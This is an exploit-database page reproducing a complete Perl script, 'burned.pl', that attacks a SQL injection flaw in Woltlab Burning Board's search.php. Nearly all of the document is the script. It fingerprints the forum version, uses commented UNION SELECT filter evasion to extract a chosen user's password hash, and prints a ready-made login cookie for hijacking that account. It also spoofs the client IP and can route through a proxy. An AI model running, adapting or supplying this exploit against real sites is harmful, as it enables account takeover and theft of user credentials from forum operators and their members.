Vulners
Lucene search
Woltlab Burning Board <= 1.0.2, 2.3.6 search.php SQL Injection Exploit 2
#!/usr/bin/perl
# Woltlab Burning Board 2.X/Lite search.php SQL Injection exploit - burned.pl
# written by trew <[email protected]>
#
# should work on every wbb regardless of php settings.
#
# v 1.2 - added 1337 sql filter evasion, version identification,better regex,raw cookie
# v 1.1 - added wbblite support (thx to lama)
#
#
#
# !PRIVATE! - !PRIVATE!
#
# Leaked by some morons from egocrew
#
use strict; # 1337
use warnings; # 31337
use LWP::UserAgent;
use HTTP::Response;
use HTTP::Status;
use Getopt::Std;
getopt('uisUpAclC');
our ( $opt_u, $opt_i, $opt_s, $opt_U, $opt_p, $opt_A, $opt_c, $opt_l, $opt_C );
my $target = shift;
sub do_request($$);
if ( !$target ) { &HELP_MESSAGE; }
my ( $host, $folder );
if ( $target =~ /(?:http:\/\/)?([\w\.\-\_]*)(\/.*)?/ ) {
$host = $1;
$folder = ( $2 ? $2 : '/' );
if ( $folder !~ /\/$/ ) { $folder .= '/'; }
$target = "http://$host$folder" . 'search.php';
}
else { &HELP_MESSAGE; }
my $ip = ( $opt_i ? $opt_i : '127.0.0.1' );
my $searchstring = ( $opt_s ? $opt_s : 'board' );
my ( $userid, $userpassword, $proxy, $proxyip );
( $userid, $userpassword ) = split( ':', $opt_U ) if $opt_U;
( $proxy, $proxyip ) = split( ':', $opt_p ) if $opt_p;
my $uid = ( $opt_u ? $opt_u : 1 );
my $useragent =
( $opt_A ? $opt_A : 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
my $prefix = ( $opt_c ? $opt_c : 'wbb2_' );
my $lite = ( $opt_l ? $opt_l : 0 );
my $isHash = 0;
print "burned.pl written by trew\n";
print "report errors \@ trew\@safe-mail.net.. thx\n";
print "[x] Attacking $target...\n";
if ( $userpassword and $userpassword =~ /([a-f0-9]{32})/ ) { $isHash = 1; }
if ( !$lite ) {
print "[x] Checking wbb version...\n";
if ( do_request( '', 'editor.jar' ) =~ /404 Not Found/ ) {
print "[x] Looks like a wbblite\n";
$prefix = "" if ( !$opt_c );
$lite = 1;
}
else { print "[x] Looks like a normal wbb\n"; }
}
if ( !$lite ) {
if ( !$opt_c ) {
my $headers = do_request( '', '' );
if ( $headers =~ /Set-Cookie: (.*?)cookiehash/ ) {
$prefix = $1;
}
else { print $headers}
}
print "[x] Cookie prefix: $prefix\n";
}
print "[x] Vulnerable check:";
my $answer;
my $pre;
$answer = do_request( '\'', '' );
if ( $answer =~ /FROM (.*?)_boards/ ) {
$pre = $1;
print " Vulnerable\n";
}
elsif ($answer =~ /Die Suche ergab keine/
or $answer =~ /No results were found for this search/
or $answer =~ /Your search is invalid/
or $answer =~ /Ihre Suchabfrage ist/ )
{
print " No Idea\n";
print "[x] Searchstring was not found, try a different one with -s\n";
exit;
}
elsif ($answer =~ /Ihnen wird der Zutritt zu dieser Seite/
or $answer =~ /Access denied/ )
{
print " No Idea\n";
print "[x] search.php only for users,";
print " wrong userdetails or wrong cookie-prefix!\n" if $opt_U;
print " give me userid+password with -U\n" if !$opt_U;
exit;
}
else {
print " Not Vulnerable!\n";
#print $answer;
exit;
}
print "[x] Unleashing black magic...\n";
$answer = do_request(
' UNION/*s12s*/ SELECT/*t35s*/ password , password /*er35*/ FRoM ' . $pre
. '_users WHeRE/*esr35*/ userid='
. $uid . '/*',
''
);
if ( $answer =~ /${folder}search.php/ and $answer =~ /([a-f0-9]{32})/ ) {
print "[x] Looks good!\n";
print "[x] Userid: $uid\n";
print "[x] Hash: $1\n";
if ( !$opt_C ) {
print
"[x] Use this Cookie:\n ${prefix}userid=$uid;${prefix}userpassword=$1\n";
}
}
else {
print "[x] Looks bad!\n";
print $answer;
}
sub HELP_MESSAGE() {
print "burned.pl written by trew\n"
. "perl $0 [options] url\n"
. "examples:\n"
. "perl $0 woltlab.de/forum/\n"
. "perl $0 -u 2 -i 127.0.0.2 woltlab.de/de/forum/\n"
. "overwrite -c and -l only when the auto-check "
. "gives you a false result\n"
. "use -C when you need some special cookies\n"
. "options :\n-u userid of victim [1]\n"
. "-i faked client-ip [127.0.0.1]\n"
. "-s searchstring [board]\n"
. "-U userid:password or userid:pwhash [none]\n"
. "-p proxyip:proxyport [none]\n"
. "-A user-agent [firefox 1.5.09]\n"
. "-c cookie-prefix [auto-check]\n"
. "-l wbblite mode [auto-check]\n"
. "-C raw cookie\n";
exit;
}
sub do_request($$) {
my $string = shift;
my $otherurl = shift;
if ($otherurl) { $target = "http://$host$folder" . $otherurl; }
else { $target = "http://$host$folder" . 'search.php' }
$string = '/*' if ( !$string );
my $ua = LWP::UserAgent->new;
if ($proxy) { $ua->proxy( 'http', "http://$proxy:$proxyip/" ); }
my $request = new HTTP::Request( 'POST', $target );
$request->content( 'boardids%5B0%5D=1&boardids%5B1%5D=2,3,4)' . $string
. '&send=1&searchstring='
. $searchstring );
$request->content_type('application/x-www-form-urlencoded');
$request->header( 'User-Agent' => $useragent );
if ($opt_U) {
my $userhash;
if ( !$isHash ) { $userhash = md5($userpassword); }
else { $userhash = $userpassword; }
my $cookie = $prefix
. 'userid='
. $userid . ';'
. $prefix
. 'userpassword='
. $userhash;
$request->header( 'Cookie' => $cookie );
}
elsif ($opt_C) {
$request->header( 'Cookie' => $opt_C );
}
$request->header( 'Client-Ip' => $ip );
my $response = $ua->request($request);
my $body = $response->content;
my $headers = $response->headers_as_string;
$body = $response->error_as_HTML if ( $response->is_error );
return $headers if ( $string eq '/*' and !$response->is_error );
return $body;
}
# MD5 Code ripped from Libwhisker for bigger portability
# thx rfp :)
{
my ( @S, @T, @M );
my $code = '';
sub md5 {
return undef if ( !defined $_[0] ); # oops, forgot the data
my $DATA = _md5_pad( $_[0] );
&_md5_init() if ( !defined $M[0] );
return _md5_perl_generated( \$DATA );
}
sub _md5_init {
return if ( defined $S[0] );
my $i;
for ( $i = 1 ; $i <= 64 ; $i++ ) {
$T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) );
}
my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 );
for ( $i = 0 ; $i < 64 ; $i++ ) {
$S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ];
}
@M = (
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
1, 6, 11, 0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12,
5, 8, 11, 14, 1, 4, 7, 10, 13, 0, 3, 6, 9, 12, 15, 2,
0, 7, 14, 5, 12, 3, 10, 1, 8, 15, 6, 13, 4, 11, 2, 9
);
&_md5_generate();
my $TEST = _md5_pad('foobar');
if ( _md5_perl_generated( \$TEST ) ne
'3858f62230ac3c915f300c664312c63f' )
{
die('Error: MD5 self-test not successful.');
}
}
sub _md5_pad {
my $l = length( my $msg = shift() . chr(128) );
$msg .= "\0" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 );
$l = ( $l - 1 ) * 8;
$msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 );
return $msg;
}
sub _md5_generate {
my $N = 'abcddabccdabbcda';
my ( $i, $M ) = ( 0, '' );
$M = '&0xffffffff' if ( ( 1 << 16 ) << 16 ); # mask for 64bit systems
$code = <<EOT;
sub _md5_perl_generated {
BEGIN { \$^H |= 1; }; # use integer
my (\$A,\$B,\$C,\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476);
my (\$a,\$b,\$c,\$d,\$t,\$i);
my \$dr=shift;
my \$l=length(\$\$dr);
for my \$L (0 .. ((\$l/64)-1) ) {
my \@D = unpack('V16', substr(\$\$dr, \$L*64,64));
(\$a,\$b,\$c,\$d)=(\$A,\$B,\$C,\$D);
EOT
for ( $i = 0 ; $i < 16 ; $i++ ) {
my ( $a, $b, $c, $d ) =
split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
$code .=
"\$t=((\$$d^(\$$b\&(\$$c^\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
$code .=
"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
}
for ( ; $i < 32 ; $i++ ) {
my ( $a, $b, $c, $d ) =
split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
$code .=
"\$t=((\$$c^(\$$d\&(\$$b^\$$c)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
$code .=
"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
}
for ( ; $i < 48 ; $i++ ) {
my ( $a, $b, $c, $d ) =
split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
$code .= "\$t=((\$$b^\$$c^\$$d)+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
$code .=
"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
}
for ( ; $i < 64 ; $i++ ) {
my ( $a, $b, $c, $d ) =
split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
$code .= "\$t=((\$$c^(\$$b|(~\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
$code .=
"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
}
$code .= <<EOT;
\$A=\$A+\$a\&0xffffffff; \$B=\$B+\$b\&0xffffffff;
\$C=\$C+\$c\&0xffffffff; \$D=\$D+\$d\&0xffffffff;
} # for
return unpack('H*', pack('V4',\$A,\$B,\$C,\$D)); }
EOT
eval "$code";
}
} # md5 package container
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Jan 2007 00:00Current
7.1High risk
Vulners AI Score7.1